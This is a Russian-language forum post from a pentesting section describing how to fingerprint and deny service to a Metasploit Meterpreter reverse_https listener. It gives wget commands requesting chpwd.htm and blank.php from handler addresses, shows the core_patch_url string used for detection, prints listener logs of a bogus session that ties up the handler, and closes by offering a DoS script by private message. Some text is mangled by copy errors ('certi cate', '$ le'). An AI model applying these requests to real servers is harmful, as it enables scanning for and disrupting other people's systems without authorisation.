Актуально ДОСИМ METERPRETER

Тема в разделе "Пентестинг", создана пользователем Дима22, 22 апр 2017.

  1. Дима22

    Дима22

    Сообщения:
    672
    Баллы:
    18
    Найденные уязвимости позволяют провести DoS-атаку на обработчик HTTPS-запросов этой утилиты. Процесс состоит из двух шагов.

    1. Используя GET-запросы к известным файлам через handler/listener и прове-

      ряя наличие строки core_patch_url, узнаем о запущенной версии утилиты.

    2. Используя вредоносный или недоделанный GET-запрос к определенным

      файлам утилиты, можно попасть в открытую Meterpreter сессию и сделать так, чтобы сессии больше не принимались (DoS).
    EXPLOIT

    Виной всему порт, который использует утилита. Он доступен по URL (проверя- лось через HTTPS-протокол).
    http://joxi.ru/RmzxVz1s0daDnA Смотрите скрин


    Там есть множество файлов, которые мы можем запросить через URL, и каждый из них, в свою очередь, вызывает разное поведение обработчика. От содержа- ния и типа получаемых файлов зависит возможность определения наличия ути- литы или проведения DoS-атаки.

    Запустим свой handler с полезной нагрузкой в виде шелла meterpreter reverse_https.
    http://joxi.ru/KAgoXWeu4V8DqA-Смотрите скрин
    Теперь попробуем получить файл chpwd.htm из listener.

    $ wget -qO- --no-check-certi cate https://192.168.1.1/chpwd.htm
    ...core_patch_url...LUDZ6djujGbWvte_gMomnQm7EQVgW7RJfg3xpGoDUgRe_
    SdhLJBud68viiiDN1UsrniHZsjxLn9qYOo4YJIIU6K5ZnhNsuoGoPuWqKpQQVtxU6
    L4EQg8ka9cZ4aJ-/
    Ну и так BTCMaker думаю заметил что этот файл содержит строки core_patch_url и следующую за ней, сгенерированную случайным образом. На стороне listener в логах видим следующее:

    73.x.x.x:47054 (UUID: 2d40d9e9d8ee8c66/x86=1/windows=1/2015-
    12-19T05:50:27Z) Redirecting stageless connection from /chpwd.htm
    with UA 'Wget/1.16 (linux-gnu)'
    Есть и альтернативный способ. Мы можем запросить файл blank.php. Это акту- альный файл для listener, который представляет собой DLL-библиотеку.
    Список доступных файлов-http://joxi.ru/J2bVa3bIXv9bp2
    и вот еще http://joxi.ru/bmoz9vLIxjJeBr

    $ wget --no-check-certi cate https://666.666.666.666/blank.php
    $ le blank.php: PE32 executable (DLL) (GUI) Intel 80386,
    for MS Windows
    Теперь в логах мы уже видим следующее:

    [*] 73.x.x.x:10458 (UUID: 376988d5161359f3/x86=1/windows=1/2015-
    12-19T04:44:20Z) Staging Python payload ...
    [*] Meterpreter session 57 opened (192.168.1.1:65535 ->
    73.x.x.x:10458) at 2015-12-19 04:44:20 +0000
    Запрос файла blank.php триггерит скрипт на Python и открывает сессию Meterpreter (правда, она неправильная и скоро будет закрыта).

    [-] Meterpreter session 57 is not valid and will be closed
    Лог самого Meterpreter подтверждает наличие ложной сессии. В итоге мы по- лучаем DoS у handler, вызывая задержку между любой «правильной» полезной нагрузкой и handler/listener.

    Помимо получения строки core_patch_url из chpwd.htm и бинарного blank.php, мы можем найти много информации среди доступных файлов (см. скриншоты).
    Кому нужен скрипт для DoS и обнаружения-пишите в личку

Поделиться этой страницей

Top